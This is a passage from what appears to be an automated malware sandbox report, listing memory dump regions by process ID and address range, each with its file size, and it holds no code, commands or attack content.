                                                                                                                                                                        Filesize

                                                                                                                                                                        112KB

                                                                                                                                                                      • memory/3876-11200-0x0000000000680000-0x0000000000688000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/4232-13577-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/4296-354-0x0000000000A20000-0x0000000000BB6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.6MB

                                                                                                                                                                      • memory/4604-72-0x0000000000400000-0x000000000069B000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.6MB

                                                                                                                                                                      • memory/4912-143-0x000002829F840000-0x000002829F862000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/5476-328-0x0000022EDEF20000-0x0000022EDF140000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.1MB

                                                                                                                                                                      • memory/5476-327-0x0000022EC4370000-0x0000022EC4591000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.1MB

                                                                                                                                                                      • memory/5476-329-0x0000022EC6360000-0x0000022EC6372000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                      • memory/5480-3167-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-703-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-700-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-701-0x0000000001160000-0x0000000001180000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        128KB

                                                                                                                                                                      • memory/5480-702-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-706-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-705-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-704-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5480-698-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        7.5MB

                                                                                                                                                                      • memory/5528-13576-0x0000000000D20000-0x0000000000D28000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/5820-3044-0x000001C6E6960000-0x000001C6E6966000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        24KB

                                                                                                                                                                      • memory/5820-3045-0x000001C6E84E0000-0x000001C6E84E6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        24KB

                                                                                                                                                                      • memory/5864-3655-0x00007FFC11350000-0x00007FFC11351000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/9172-13370-0x0000000000410000-0x0000000000418000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/10104-11462-0x0000000000BB0000-0x0000000000BB8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/10368-11461-0x0000000000310000-0x0000000000318000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/10640-11463-0x0000000000100000-0x0000000000108000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/14916-11995-0x00000000007F0000-0x00000000007F8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB

                                                                                                                                                                      • memory/16188-12132-0x00000000003F0000-0x00000000003F8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        32KB